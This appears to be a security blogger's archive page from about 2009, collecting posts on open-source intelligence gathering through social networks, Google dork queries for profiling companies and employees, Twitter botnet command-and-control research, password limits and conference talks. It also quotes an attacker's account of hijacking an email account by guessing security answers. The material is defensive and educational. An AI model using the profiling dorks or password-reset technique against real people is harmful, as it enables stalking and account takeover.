Maltego (built-in metadata transform) http://www.paterva.com/web4/index.php/maltego (another favorite!)
Meta-Extractor http://meta-extractor.sourceforge.net/
FOCA http://www.informatica64.com/foca/

What’s the deal with brand reputation?
One last point I want to make is about brand reputation.  You may ask yourself, how does brand reputation relate to information security? Why should we care?  I have found it interesting that many of us in information security have been asked to do more research on brand reputation issues because no one else in the company had those types of skill sets to monitor information.  Brand reputation is vital to an organization, even more so in this economy.  Think of the CIA triad…Confidentiality, Integrity and Availability.  All three have aspects that reflect brand reputation.  All of us in information security need to be thinking of brand reputation in our daily job.

Next up in part three
In part three I will talk about setting up a simple monitoring program with the sites and tools I have mentioned thus far.  This will include how to start using Yahoo! Pipes to aggregate many of the feeds I talked about.  I will also conclude with information on how to create a Internet Postings Policy or now better known as a Social Media Policy for your company and why this is more important then ever.

Next week I will be speaking at the 7th Annual Ohio Information Security Summit on “Enterprise Open Source Intelligence Gathering”.  Here is the talk abstract:

What does the Internet say about your company?  Do you know what is being posted by your employees, customers, or your competition?  We all know information or intelligence gathering is one of the most important phases of a penetration test.  However, gathering information and intelligence about your own company is even more valuable and can help an organization proactively determine the information that may damage your brand, reputation and help mitigate leakage of confidential information.

This presentation will cover what the risks are to an organization regarding publicly available open source intelligence.  How can your enterprise put an open source intelligence gathering program in place without additional resources or money.  What free tools are available for gathering intelligence including how to find your company information on social networks and how metadata can expose potential vulnerabilities about your company and applications.  Next, we will explore how to get information you may not want posted about your company removed and how sensitive metadata information you may not be aware of can be removed or limited.   Finally, we will discuss how to build a Internet posting policy for your company and why this is more important then ever.

Leading up to my talk at the summit this series of posts will focus on several of the main topics of my presentation.  I plan on referencing these posts during the presentation so attendees can find out more information about a specific topic that will be discussed.  I will touch on the following main points in this series: Part 1 – Gathering intelligence on social networks, Part 2 – Gathering intelligence from blogs/message boards/document repositories, Part 3 – Putting together a simple monitoring program/toolkit and creating a Internet postings (social media) policy for your company.

This first post in the series will focus on gathering intelligence on social networks.  The topic of gathering intelligence from social networks will be looked at in two ways.  First, through the eyes of the penetration tester or attacker.  Second, from a monitoring perspective relative to the enterprise and business.

What is OSINT?
Open Source Intelligence (OSINT) is basically finding publicly available information, analyzing it and then using this information for something.  That something can be extremely valuable from the eyes of an attacker.  For a fantastic overview of how OSINT is used specifically from a penetration testing perspective I suggest you check out the presentation that Chris Gates recently did at BruCON.  Chris goes into detail and provides good examples on how OSINT can be used in gathering intelligence on a network infrastructure as well as how to profile company employees.  All of the techniques Chris talks about should be used in a penetration testing methodology.

Why look for OSINT about your company?
I have found that OSINT is surprisingly often overlooked by most businesses from a security monitoring perspective.  If a company does any monitoring of public information at all it is usually found in your public relations and/or marketing groups.  These groups traditionally don’t look for things that could be used to target or profile an organization.  The same information that is being viewed by your PR/Marketing department needs to be looked at by your in house information security professionals.  Specifically, I suggest people in your information security department with an “attacker mindset” look at this OSINT.  This could be people on an internal penetration testing team or someone involved with the security assessments in your organization.  You should really ask yourself: If you don’t know what information is publicly available about your company…how can you properly defend yourself from attack?

OSINT and Social Networks
Social networks have recently become the 4th most popular method for online communication (even ahead of email) today.  If you are not looking for OSINT on social networks you are potentially missing major and vital pieces of information.  Having said that, searching for OSINT on social networks brings its own challenges and needs to be looked at slightly different then looking at other forms of OSINT.  For example, you might find that searching for information on social networks like Facebook different because there is both private and public information.  Facebook as an example has a built in search feature “behind” a valid login id and password.  Searching Facebook in this manner can yield better results then just going to Google or using a specific social network search engine (I’ll talk more about Facebook below).

1. Social Network Search Engines
There are lots of different search engines that specifically look for “public” information on some of the major social networks.  The disadvantage about these types of search engines is that they only pull public information that can be easily indexed.  Private information like the Facebook example above cannot be indexed without violating the TOS (Terms of Service) even though there are tools like Maltego that can have transforms written to “page scrape” this information (more on that in the Maltego section below). Here is a list of social network search engines that I recommend you check out to search for this type of public information (there are more…this is just the list I use).  While there are other ways to search specific social networks (like search.twitter.com or FriendFeed) the list below just mentions search engines that search multiple networks:

Wink http://wink.com/
Spock http://spock.com (has a search for “private” profile info but is a pay service…haven’t checked that feature out)
Social Mention http://socialmention.com/
WhosTalkin http://www.whostalkin.com/ (this is one of my favorites! Lots of socnets included!)
Samepoint http://www.samepoint.com/
OneRiot http://www.oneriot.com/
Kosmix http://www.kosmix.com/
YackTrack http://www.yacktrack.com
Keotag http://www.keotag.com/
Twoogle http://twoogel.com/ (Google/Twitter search combined)
KnowEm Username Check http://knowem.com/
Firefox Super Search Add-On https://addons.mozilla.org/en-US/firefox/addon/13308 (over 160 search engines built in)

Don’t forget about photo/video social networks and social bookmarking sites:

Pixsy http://www.pixsy.com/
Flickr Photo Search http://www.flickr.com/search/?s=rec&w=all&q=”comapny name”&m=text
YouTube/Google Video Search http://video.google.com/videosearch?q=”company name”
Junoba Social Bookmark Search http://www.junoba.com/ (Digg, Delicious, Reddit, etc..)

Pay Services (might be worth checking out):

Filtrbox http://www.filtrbox.com/
Vocus http://www.vocus.com/

2. Maltego
Maltego goes without saying…it’s probably the best tool to “visually” show you information found on some of the social networks and the relationships that information has connected to it.  I have found that Maltego works well for Twitter, Facebook, LinkedIn and MySpace profiles (publicly available).  The Twitter transforms are probably the highlight since you can dig into conversations as well.  There is also a Facebook transform that was specifically written to search within the Facebook network using a real user account.  However, this transform doesn’t work anymore due to recent structural changes to the way Facebook HTML was coded.  Note that this transform violates Facebook TOS since it did screen scraping but when it did work it was a great way to search status and group updates not available to public search engines!  If anyone wants to help get this transform working again there is a thread on the Maltego forum about it.

Lastly, if you want more information on Maltego and how to use it I suggest checking out the work Chris Gates has done in his Maltego tutorials here and here to learn more.  Keep in mind.  Maltego works great for finding information if you need it for a specific scope, like a pentest.  Maltego even works great if you need to dig a little deeper into something you find on a social network.  In terms of automating a monitoring process, I suggest using Google dorks, Yahoo Pipes!, and other techniques which we will talk about here and in future posts.

3. Google Dorks (Facebook, MySpace, LinkedIn)
While you can just simply type in your company name into Google and see what comes up…It’s way easier to use a little Google dork action to search for information on specific social networks.  As I stated before, this will only pull publicly available information but you might be surprised what you find about your company just in these searches!  Simply paste these into the Google search bar/window.  Note: change “bank of america” to whatever you like…not picking on bofa but there is a ton of information about them on social networks!

Facebook Dorks
Group Search: site:facebook.com inurl:group (bofa | “bank of america”)
Group Wall Posts Search: site:facebook.com inurl:wall (bofa | “bank of america”)
Pages Search: site:facebook.com inurl:pages (bofa | “bank of america”)
Public Profiles: allinurl: people “John Doe” site:facebook.com

*To search personal profile status updates (unless they were made public wall posts via pages or groups) you need to be logged into Facebook and use the internal Facebook search engine.  Setting your status updates privacy settings to “Everyone” is actually everyone in Facebook.  Rumor has it that next year “Everyone” will mean everyone on the Internet! FTW!

MySpace Dorks
Profiles: site:myspace.com inurl:profile (bofa | “bank of america”)
Blogs: site:myspace.com inurl:blogs (bofa | “bank of america”)
Videos: site:myspace.com inurl:vids (bofa | “bank of america”)
Jobs: site:myspace.com inurl:jobs (bofa | “bank of america”)

LinkedIn Dorks
Public Profiles: site:linkedin.com inurl:pub (bofa | “bank of america”)
Updated Profiles: site:linkedin.com inurl:updates (bofa | “bank of america”)
Company Profiles: site:linkedin.com inurl:companies (bofa | “bank of america”)

While these are Google dorks from the top three social networks (Twitter actually has a really good search engine, search.twitter.com, which I don’t think needs explaining), you can easily modify these for your own use and even include more advanced search operators to include or exclude additional queries.  The point of using Google dorks is to make it easier to quickly search for information on social networks without going to each site individually.  Still, with most social networks if you want to find private information you either need to login as a user or use some social engineering get the information you want.

What’s next?
In part three of this series I will talk about how to use Google dorks and various search queries for monitoring purposes.  Once you have the dorks you want to query, it’s trivial to plug these into Google Alerts to create RSS feeds.  Take your feeds and plug them into your favorite RSS reader and you have a simple monitoring tool.  More on this in part 3 including a section on aggregating this type of into and customizing it via Yahoo! Pipes which I like to think as the preferred and most customizable method for monitoring social networks.

Next up…in part 2 I will talk about how to find company information on blogs, message boards and document repositories.  Oh, and sprinkle a little bit of metadata into the mix as well.

What I find fascinating (like most things in security) is that now that there has been a real confirmed case of using Twitter for botnet C2 (Command & Control) the media seems to be jumping on it and even trying to determine “why it took so long for hackers to take Twitter to the dark side”.  Well, you can’t say we didn’t warn you.

The point that Robin, myself and others were trying to make way back in April was that this is a real threat and the bad guys have probably started to use Twitter for C2 even before Robin put out the code!  We were hoping that by releasing the code Twitter (and others) would see this as perhaps an early warning of things to come and perhaps prepare some defense for it (yes, we know it’s hard to put a defense together for something like this).  Now that we have a confirmed case used for malicious purposes we hope Twitter takes this seriously and can combat future C2 channels used for very bad things.  It always takes something bad to happen to create change…where have you heard that before?

You can download the slide deck from SlideShare that was in the DEFCON 17 CD.  We plan on giving the talk a few more times in the next few months so we don’t plan to release the full version of the slide deck yet.  However, we will post the video as soon as we get it.  The slides on the DEFCON CD are mostly text…no cool Zombie graphics (thanks to @JaneDelay for the Photoshop work BTW) but it should give you a good overview of the talk.

Robin Wood’s fantastic tool called KreiosC2 was also released during our talk.  I did a demo which is posted here and talked a lot about how the PoC code functions.  If you don’t know already…KreiosC2 is a tool written in Ruby which allows IRC like command and control of systems over Twitter.  Very cool!  Also, check out the redesign of Robin’s website.  Awesome.  Make sure you follow Robin on Twitter!  He is one you need to follow!

DEFCON was awesome as usual!  Lot’s of people this year..perhaps an increase from last year and of course the usual hijinks.  It was awesome catching up with everyone and meeting new people.  I attended lots of great talks including the “DEFCON Security Jam 2: The Fails Keep on Coming“.  This was one that you should see the video for…especially the presentations by @haxorthematrix and @myrcurial.  Speaking of @mycurial…you really need to see the awesome yet scary presentation that @myrcurial and @TiffanyRad did on Sunday titled “Your Mind: Legal Status, Rights and Securing Yourself“.  I highly recommend this talk!

The podcasters meetup was also a success!  Thanks to @pauldotcom for hosting and for throwing such an awesome party this year and a shout out to the guys over at I-Hacked.com!  The audio will be posted soon, probably over at the Security Justice site.

Pictures will be posted soon!  Still trying to recover from Vegas!

In addition, at the top of the page are links to downloadable guides, presentations, video’s and more.  All of this content is related to user education and awareness on social media security issues.  This is obviously a work in progress and I plan to have more content added to this very soon.  One thing I am working on that I wanted to get out before my talk at DefCon was a detailed walk-through video of the Facebook Privacy Settings (basically a walk-through of my guide).  I haven’t finished the video yet and I might have to redo it since Facebook will be releasing a new interface for privacy settings in the near future.  The plan is to do one for each of the major social networking sites as well as a downloadable guide like the Facebook one.

So…you can also concider this a call for volunteers!   If you would like to contribute anything (guides, videos, research, tools, blog on the site) or have feedback let me know by sending me an email (tom[aT]spylogic.net).  There are a few other researchers and volunteers working on some really cool stuff for the web site.  Far too many ignore the security and privacy issues of social media.  We welcome your participation to help make a difference!

Who knows what the developers of this application were planning (malicious or others).  Regardless, you should never give a third party site (especially ones that look phishy like this one) your Twitter credentials.  In fact, I recommend you only use third party Twitter sites that use OAuth for authenticating you to Twitter.  That way you don’t have to give your credentials to the web site and worry about them being compromised.  Also, look to see what the purpose of the site is before you give the jewels away…if it’s a way to see who’s following you, enter credentials to get millions of followers, etc…then it’s probably a scam or just completely useless.

Think about this.  If the developer of a site like this wanted to they could easily use your captured Twitter credentials and start trying them on other social networks and/or web mail services.  They can then use these credentials for anything else they wanted.  Unfortunatly, most users of these sites use the same password for everything.  Again, this is a reminder to use a password manager if you are one of those that use the same user id/password for everything.  See this article for more information on password managers and social media web sites.

My part of the talk is focused on security and privacy concerns with social networks, fake accounts, using social networks for penetration testing and the proliferation of bots on social networks.  I will also be talking about a new version of Robin Wood’s fantastic “Twitterbot” (we actually have a new name for the tool which will be announced at DefCon).  I’ll be providing a live demo showing the new and improved features of his tool!  Big shoutout to Robin for all the work he did on this tool!

The other speaker is Kevin Johnson who you may know as the project lead for BASE and SamuraiWTF (Web Testing Framework).  Kevin is also a SANS instructor for Security 542 (Web App Penetration Testing and Ethical Hacking).  When he isnt managing projects and teaching he’s most likely abusing “playing with” social networks.  Kevin will be talking about SocialButterfly which is an application that can leverage and exploit various social network API’s.  He will also talk about manipulating social networks (and thier users) with third-party applications.  Remember: please accept any and all “friend requests” from Kevin Johnson!

From our talk abstract:

In Social Zombies: Your Friends want to eat Your Brains, Tom Eston and Kevin Johnson explore the various concerns related to malware delivery through social network sites. Ignoring the FUD and confusion being sowed today, this presentation will examine the risks and then present tools that can be used to exploit these issues.

This presentation begins by discussing how social networks work and the various privacy and security concerns that are caused by the trust mass that is social networks. We use this privacy confusion to exploit members and their companies during our penetration tests.

The presentation then discusses typical botnets and bot programs. Both the delivery of this malware through social networks and the use of these social networks as command and control channels will be examined.

Tom and Kevin next explore the use of browser-based bots and their delivery through custom social network applications and content. This research expands upon previous work by researchers such as Wade Alcorn and GNUCitizen and takes it into new C&C directions.

Finally, the information available through the social network APIs is explored using the bot delivery applications. This allows for complete coverage of the targets and their information.

How did this talk come together?  Kevin and I had some past converations regarding social network bots (mostly from my Notacon 6 talk) and decided that much of our research was similar so it made sense to “combine forces” to work on some of this research together.  Also, by working on bots and socnet bot delivery mechinisms we hope to raise awareness about some of the security and privacy threats that are out there, not just for the users of social networks.  Oh, and we both like Zombies.  See you at DefCon!

The adventure of blog migration to WordPress
I started the transition from Nucleus CMS to WordPress early last week…of course thinking this would be an easy migration.  Ummm, no.  It was pretty painful actually.  You see, WordPress doesn’t have a official migration path from Nucleus CMS.  So I had to rely on the advice of others in the WordPress community that had done the same upgrade in the past.  Of course there were a bunch of different ways to do this so I basically took a few of the migration scripts that a few others have written, hacked them up even more and tested.  Testing took about a week…it really sucked.  I had to install version 2.1 of WordPress to use a certain migration script that I didn’t feel like recoding to get to work with 2.8.1.  Of course my categories and images were FUBAR so there was another script I had to write to fix that.  BUT, the biggest issue was how Nucleus handles URL’s for blog posts.  The problem was that I had lots of links out there in Google and other places pointing to blog posts.  In Nucleus my post links were like this:

http://spylogic.net/item/438

WordPress links are something like this:

http://spylogic.net/2009/07/password-length-and-complexity-for-social-media-sites/

So your probably thinking that I can just make my links in WordPress match the Nucleus links?  Nope.  WordPress renumbered all my posts out of order and writing another script to re-number 400+ posts wasn’t in my plan.  So…mod_rewrite and php scripting to the rescue!  I must say, I haven’t had a situation yet where I had to manipulate URL’s on a website yet but now that I did…mod_rewrite is awesome and it was a great learning experience.  I won’t go into gory detail but in a nutshell I used a SQL query to map my old numbered posts from the nucleus posts table to the WordPress style URL naming…by date so they match up.  I then took that query output and put it into a php script.  The php script is referenced in my .htaccess file that contains the RewriteRules.  So…when someone clicks on the old style Nucleus links the script maps it to the new links.  Cool.  If you want to see all of the code I followed the guide that another blogger posted about his migration but made my own modifications and did a few things different then his code did…but you should get the general idea.

What changes?
So besides the blogging platform other things I decided to do was a new logo/header that @JaneDeLay created for me (she rocks!) and I decided to include more of my other publications, articles and such in separate pages.  I also put a speaking page where you can find out where I’m speaking at and also a list of past talks (something a few of you have wanted to know).  RSS feeds are still through FeedBurner so you don’t have to update your feeds.  Lastly, I decided to move the majority of my social media security research to another site altogether.  This site is focused on social media security and will have guides, videos, presentations and research from not only myself but others.  I’m planning on launching the site at DEFCON 17 at my talk or right before it.  It’s been difficult blogging about anything lately because of my crazy work/home/life schedule so hopefully the new site will bring some focus back into blogging and about other things besides social media. I’ll probably mention some of the content from the new site on this blog if it seems relevant.

Anyway, let me know if you have any feedback on the new site (there might be a few bugs still) and thanks for reading my blog!

ANYWAY, back to my point….I sent out some tweets about changing your Twitter password and now being a good time to use a password manager like Keepass to manage multiple, complex passwords for everything…not just social media sites. One problem though is that each site might have different password length and complexity requirements. This becomes an annoying issue when you choose a randomly generated password like I suggest when using a password manager. You will encounter many sites that have specific requirements and others that do not. Obviously, the longer and more complex the password is the harder it is to crack so I suggest going as long as you can. Sad that there are these limitations on certain sites (blame the site developers) but if you set your random password generator to a very large number (I recommend at least 20 with a mix of everything you can throw at it including white spaces if the site will let you), it’s as good as your going to get.

Keep in mind, some applications even supported by the site (like the Facebook app for BlackBerry and iPhone) might not like passwords over a certain length or even certain special characters…you will know once you use these apps. Also, I mention Keepass as a password manager because you can use it on a BlackBerry or Windows Mobile device as well…an iPhone version is being worked on. So here you go…max password lengths for the major social media sites:

Twitter
None. I tried a 500 character password with everything but white spaces and it worked.

Facebook
None. I tried a 1000 character password with everything but white spaces and it worked.

MySpace
10 characters! Wow…really bad. Now I know another reason MySpace sucks.

LinkedIn
16 characters! This is interesting. LinkedIn truncates the password to 16 characters! Even if you put in a password larger then 16 characters it will only use the first 16, you can actually see this when entering in a password. No user notification, no info about this in the ‘help’ section. Sneaky and evil.

YouTube
None. Your account is tied to your Google account so is kind of a pain to change…but I didn’t find any issues with length or complexity.

On another note…I wonder if Twitter and Facebook truncate the passwords at a certain length and don’t tell you? Not sure…but it would be interesting to find out. This is another bad design as a they could easily just hash the entire password (which is a certain manageable length) and the hash is stored in the database not the large character password. Does this mean that sites like MySpace and LinkedIn are storing passwords in clear text? Also, I have run into other sites (non-social network) that actually truncate the password because when you try to login with an overly complex password…you get denied! Then you enter the cycle of doom…resetting your password thinking you fat fingered that password to begin with over and over. :-/

Are social media password limitations working against you?
Finally, just a quick point on this. Social media sites like MySpace and LinkedIn should NEVER have any limitations on password length or complexity. Certain complexity restrictions (like white space or strange characters) I could understand since you would have to use these passwords on mobile devices and other integrated apps. However, there are no technical limitations of just hashing the passwords to a constant length…and we all know storing passwords in a database in clear text is never a good thing.

Shouldn’t these social media sites that you already give your personal information to be trying to protect you the user as best as they can by letting you set a long and complex password? Let’s hope MySpace and LinkedIn get better at this real soon!

This article started from me actually seeing how much information there is about businesses within social networks. Both good and bad! The information I have found has been extremely valuable when conducting penetration tests. In fact, this information can be so valuable that you may be surprised how easy it is to use this information for social engineering or more…the possibilities are endless. As I pointed out in my article, get together with the business leaders in your marketing and/or public relations group and talk about social media and how to use it with a bit of security and privacy in mind. You might be surprised how receptive they are to the input from a security professional!

Old School!
Wireshark
Ettercap
Cain

New School!
Network Miner
The Middler
SSLStrip

* Note: …both the new and old school tools provide the pentester with a ton of value! Use them all!

MITM Defense
ArpON
ArpWatch

UPDATE: Click here to view the slide deck.

So I recently installed the Facebook Blackberry Application v1.5 on my BlackBerry and noticed two interesting settings. First, you can sync your Facebook calendar with your BlackBerry calendar. Second, you can sync your Facebook contacts with your BlackBerry contacts. As far as I can tell syncing is only one way…sort of. The Facebook application has a disclaimer when you install the application that says:

Facebook will “periodically send copies of your BlackBerry device Contacts to Facebook Inc. to match and connect with your Facebook Friends.”

So does this mean Facebook has a copy of your corporate contacts? They must somewhere to do the proper sync matching. There is another disclaimer at the bottom of the “setup wizard” that says you allow Facebook to do this interaction per the same way applications have access to your profile data in Facebook. Interesting. Again, not a nightmare situation…but if any of your business contacts are sensitive in nature I would be hesitant to enable this feature. Worse case? I couldn’t think of a worse security nightmare then of all your users automatically sending sensitive calendar entries with proprietary data to Facebook! So yeah, one way is good. For now one way sync is all the Facebook application does but I would be willing to bet that this will change in the future. Be careful with this one.

So lets step this up a bit. What about two way syncing applications like Google Sync? Google Sync will sync your Google Calendar/Contacts with your Blackberry Calendar/Contacts…both ways! This might be a real problem if you make your Google Calendar public or share it with a group of friends. Same goes for your business contacts. You may have just given Google (and possibly the world) all your business calendar entries. Well..we know Google isn’t evil, right? :-/

What can we do about this? As a user…opt out of installing any syncing apps on your corporate BlackBerry for starters. But what about blocking syncing on the device via BES policy? As far as I can tell the only way is to block the application from being installed via policy. This will become problematic when Google/Facebook releases new versions for example. Not sustainable. I’m no BES administrator but there might be other ways to prevent the application from being installed or the syncing from happening but it brings up some interesting discussion. By the way, there are some problems when you have the Facebook application and Google Sync installed at the same time. No thanks.

Something else to think about. How does your company handle BlackBerry deployments? Are they company issued and owned? Or do you allow your users to own them and the company pays for the data plan? All of this would have to be considered before blocking or preventing syncing applications (or any third-party application) from being installed. If you have any thoughts or ideas on this, comment below!

Just like most other smaller con’s the best part is still the great networking opportunities. One talk that was really outstanding was the talk by James “Myrcurial” Arlen titled “From a Black Hat to a Black Suit – The Econopocalypse Now Edition”. His talk is honestly one that anyone wanting to advance their career in Information Security should see. One thing I took away from his talk was that those of us in Information Security should never forget to mentor others, especially those in an entry level position. Remember, we were all the new guy just getting our feet wet at some point…having a mentor is invaluable to the learning process especially in the beginning of your career. In addition, James is a great guy and is someone who has pretty much “seen it all” when it comes to the corporate world.

Rise of the Autobots: Into the Underground of Social Network Bots Presentation Materials
My presentation went great! Thanks to everyone that came out to see it and for all the feedback. I was stoked that we were able to release some really cool code thanks to Robin Wood and announce a new open source project. You can download the Twitterbot POC code here from Robin’s website. I posted the slides from my presentation on Slideshare and the video should be up with the rest of the Notacon presentations soon. This won’t be the end of this research. I am hoping to put together a white paper on this subject using the research I have done thus far. The Notabot code I mentioned is available on the socialnetworkbots.com project site which I will talk about more below.

UPDATE: The video from my Notacon talk is available now to view on Vimeo.

Details on the Social Network Bots Open Source Project
I created a SourceForge project for all the development for the bot army I am looking to create (joke). Basically I’m looking for others interested in developing bots for social networks to join up on the team and contribute code to the project. I have already talked to some of you at Notacon and there looks like a few of you would like to work on N0tab0t version 1.1 which might be…well interesting to say the least! You can check out the project on socialnetworkbots.com. We are looking for any kind of social network bot…not just Twitter bots. If you want to join in, post something on the project forum or send me an email.

Stay tuned. Lots of more social media security research goodness coming soon! Thanks for sticking around for the ride!

Shortly after my talk on Saturday I will have my presentation posted as well as links to the code being released and links to the new project I will be talking about. Stay tuned to this blog for those details over the weekend.

At Notacon I will also be participating in Notacon Radio with the other co-hosts of the Security Justice podcast. Follow Security Justice on Twitter for details on when we will be live. We should be doing some interviews with some of the speakers as well. If you are at the con, stop by and say Hi!

Some other events at Notacon…there is a Security Twits meetup taking place on Thursday organized by @geekgrrl. If you plan on going you need to RSVP via DM to her like yesterday…I’ll be there as well as a few others from Twitter.

I also posted a list of recommended Notacon speakers and events on the Security Justice web site you can check out here so I won’t regurgitate the speakers that I will be going to see. Anyway, I should be live tweeting as I usually do at conferences so be sure to follow me for Notacon updates.

Lastly…this has been a crazy 2-3 months for me. Lots of changes going on with things I have been involved with and projects I have been working on. With all of this activity it has left little time for the blog but I will be getting back into regular posting once things slow down a little so thanks for sticking around. I am still amazed that this whole social media/networking security research has really taken off for me. I must have found a niche! I still have a focus on pentesting (mostly for my job) but it’s cool to see how other interests evolve and morph into greater things. Such is life right?

How do you know that last friend request or Twitter follower was an actual live human being? The truth is…you don’t! Bot’s and bot manufactures have become rampant in social networks such as MySpace, Facebook and Twitter exploiting the trust relationships that make social media work. Why are bots taking control of social networks? It’s simple. Social networks are the fastest growing phenomenon of our time. For example, Facebook alone recently reached 150 million potential targets for spammers, malware authors, and other undesirables in 2008. Social networks are only getting bigger and bots will be part of this trend.

This presentation will take you on a journey into the thriving bot underground where bots are manufactured for every purpose imaginable. We will talk about good bots, bad bots, *really* evil bots, how to identify bots, terminating bots and the future possibility of social network botnets to rule them all.

This talk is the result of many months of research that I have been doing on this subject. Here are three things from my research as a teaser for my talk:

1. You will find it fascinating that bots are a huge part of social networks. Bots are not only used by the bad guys but legitimate users as well.

2. There will be discussion on why spammers are targeting social networks and how most of this bot activity falls under the guise of “Blackhat SEO“. I have been finding that there is a thin line between what constitutes “Blackhat” vs. “Whitehat” and that line will continue to blur. You will be amazed (as I was) with the business and money making model(s) that spammers and malware authors use. There is a ton of money being made from using these techniques and tools! Want an idea how much? Check out Jeremiah Grossman’s recent presentation on Blackhat SEO…you might want to quit your day job.

3. How do you use bots to create accounts? What are the most popular tools available? How about just buying hacked/bot created accounts in bulk then use these tools to SPAM friends lists? Also, as a tie in to the tools that are used we will talk about why CAPTCHA’s and other controls are not working. Finally, don’t forget about the new frontier of botnets and social networks…this is an untapped area thats only going to get more interesting.

So, if you are coming to Notacon 6 (April 16th-19th) hopefully you can stop by. I promise, my talk will be entertaining! Stay tuned to this blog…after the talk I plan on releasing detailed articles on some of the specific topics from the talk.

If you don’t know who Chris Nickerson is…then you should. Chris is the founder of Lares Consulting, was on the Tiger Team TV show and also a frequent speaker at security conferences who talks about tiger team/red team operations. He also talks about how social engineering is more important then ever to include in your penetration testing program. I couldn’t agree more! In fact, he’s giving a free webcast with Mike Murray on March 10th called “Modern Social Engineering – A Vital Component of Pen Testing”.

Via the Carnal0wnage Blog:

“The world of Information Security is changing. Budgets are tighter, attacks are more sophisticated, and the corporate network is no longer the low hanging fruit. That leaves web-enabled applications as the vector-du-jour, but that well is quickly drying up for organized crime as well. As they creep up the OSI Model looking for easier ways to steal your corporate assets, they are quickly making their way up the stack to the unspoken 8th layer, the end user. So what is the next step in the never-ending escalation of this cyber war?

To find out, we must do as Sun Tzu taught. “Think like our enemy!” That is, after all, the primary tenet of penetration testing AKA ethical hacking, isn’t it? After years of hardening physical systems, networks, OSs, and applications, we have now come full circle to a new dawn of attack. People are now the target of the advanced hacker, and the cross-hairs are focused squarely on their foreheads… literally. It is only a matter of time before corporations feel the pain of wetware hacking requiring a new approach to testing and defense. “

You can sign-up for the webcast here. Also, Chris and Mike are doing a “Social Engineering Master Class” at ChicagoCon this year which looks awesome! Looks like there are only 25 seats so check it out if you can. Interestingly enough Chris has just started blogging so be sure to check out his blog. If that wasn’t enough…we (Security Justice) recorded a special edition podcast with Chris in which he talks about his adventures on the Tiger Team TV show.

RULES: Once you’ve been tagged, you are supposed to write a note with 25 random things, facts, habits, or goals about you. At the end, choose 25 people to be tagged. You have to tag the person who tagged you. If I tagged you, it’s because I want to know more about you.

This sounds fun and a good way to network with your friends, however, let me tell you why putting in this information might be a bad idea.

What’s the big deal? This is fun…right?
One of the basic rules everyone should be following when using social networks is that you should consider everything you post as public information. For example, would you write down these 25 random things about you, stick your name on it, make copies and put them in the mailboxes of complete strangers in your neighborhood? Are all of the people you are friends with truly your friends? Will they always be your friends? How is your profile configured? Have you looked at your “Notes” application settings in Facebook? More importantly, do you allow your profile to be searched by search engines? If you posted these 25 random things to your profile and/or wall, you may have inadvertently allowed these things to be found by total strangers. Remember, personal information on social networks always seems to get out even if you do use the correct privacy settings…sometimes through no fault of your own.

Can I haz your password plz?
With these 25 random things about you someone may even be able to use your answers to gain access to your email, other social networks, bank accounts, etc…why? Check out this list of questions that are asked when requesting a “lost password” or “password reset”. Many of these are from online banking and other sensitive web sites and looks similar to…25 random things about you.

Think this doesn’t happen? This type of attack did happen to Vice Presidential candidate Sarah Palin last year. A hacker was able to reset her Yahoo email account password using information he found on her publicly accessible Wikipedia page. Here is a quote from the Sarah Palin hacker:

“…after the password recovery was re enabled, it took seriously 45 mins on wikipedia and google to find the info, Birthday? 15 seconds on wikipedia, zip code? well she had always been from wasilla, and it only has 2 zip codes (thanks online postal service!)

I found out later though more research that they met at high school, so I did variations of that, high, high school, eventually hit on Wasilla high I promptly changed the password to popcorn and took a cold shower”

This could happen to anyone! So by knowing some of your 25 random things, someone may be able to reset your passwords, impersonate you or even cyberstalk you. My advise? Don’t fill these things out or leave these surveys very general and not too detailed. Email might even be a safer place for this type of information…. Stop and think before you post overly detailed information about your life on social networks..it can all potentially be used against you.

UPDATE: Ummm…someone *may* have hacked the Windows kiosks at the hotel…saw Ubuntu loading on one and Howard the Duck playing on another…probably shouldn’t use those kiosks, huh?

Anyway, I thought I would share some first impressions of the talks and what I will probably attend. Keep in mind, there are lots of great talks going on all weekend and it will be really hard to make all the ones I want to see but here is my short list of not to miss talks:

Friday, February 6th

Open Vulture – Scavenging the Friendly Skies Open Source UAV Platform
Ethan O’Toole and Matt Davis

An open source UAV? How friggin’ sweet is that? Now you too can spy on your own neighborhood…

Building the 2008 and 2009 ShmooBall Launchers
Larry Pesce and David Lauer

Of course I will be in this one! Dave from Security Justice and Larry from PaulDotCom will be talking all about the new ShmooBall launchers for this year. Dave and Larry never disappoint and I assume there will be some surprises as well.

Decoding the SmartKey
Shane Lawson

I love physical security just about as much as information security so this one should be interesting. Shane will talk about how to decode the Kwikset SmartKey with materials costing under $5.

Podcasters Meetup/HacDC party

I will be there along with Matt and Dave from Security Justice. Looks like we are going to do a live show at 8pm, give away some prizes, start FireTalks then party with the folks from HacDC. Check out the podcasters meetup site for more details on times and official schedule.

Saturday, February 7th

Radio Reconnaissance in Penetration Testing – All Your RF Are Belong to Us
Matt Neely

My friend and fellow co-host of the Security Justice podcast, Matt Neely is doing a talk on ways to use radio reconnaissance in pentests. Matt does a ton of research with wireless so it should be really interesting to see what new techniques he has come up with. I hear that Shmoo Balls may be launched during this talk….

Fail 2.0: Further Musings on Attacking Social Networks
Nathan Hamiel and Shawn Moyer

I was at BlackHat last year and saw Nathan and Shawn’s talk titled “Satan is on my friends list”. These guys do great research on social network security and I am looking forward to see the new stuff they came up with for this year. As a bonus, they should have AFF (Adult Friend Finder) pr0n and related adventures.

Man in the Middling Everything with The Middler
Jay Beale

Jay Beale is speaking once again about the Middler! You may remember the Middler was to be released at Defcon last year…that didn’t happen for a bunch of reasons. However, I think Jay will finally be ready to release it! Jay is a great presenter to boot..highly recommended you attend this one. Another talk to beware of Shmoo Ball cannon fire…

802.11 ObgYn or “Spread Your Spectrum“
Rick Farina

All Your Packets are Belong To Us: Attacking Backbone Technologies
Enno Rey and Daniel Mende

The Fast-Track Suite: Advanced Penetration Techniques Made Easy
David Kennedy

You may remember Dave from one of the first Security Justice Special Editions last year. Dave will be going in depth with the Fast-Track suite which is part of Backtrack 3. Knowing Dave, I’m sure he will be talking about and/or demoing new features in Backtrack 4. Shmoo Ball cannon may make an appearance…

Sunday, February 8th

Enough with the Insanity: Dictionary Based Rainbow Tables
Matt Weir

Yes! Improvements to rainbow tables…can’t wait!

RFID Unplugged
3ric Johanson

Looks like RFID is going to torn apart in this one…good stuff! Interested in the PayPass vulnerabilities he is going to talk about.

0wn the Con
The Shmoo Group

What to know what it takes to put ShmooCon together? Be sure to check out this talk and learn how it’s all done.

If you are around the con send me a tweet on Twitter or stop by the Podcasters Meetup if you want to chat! Hoping I can blog and/or live Tweet from some of the talks.

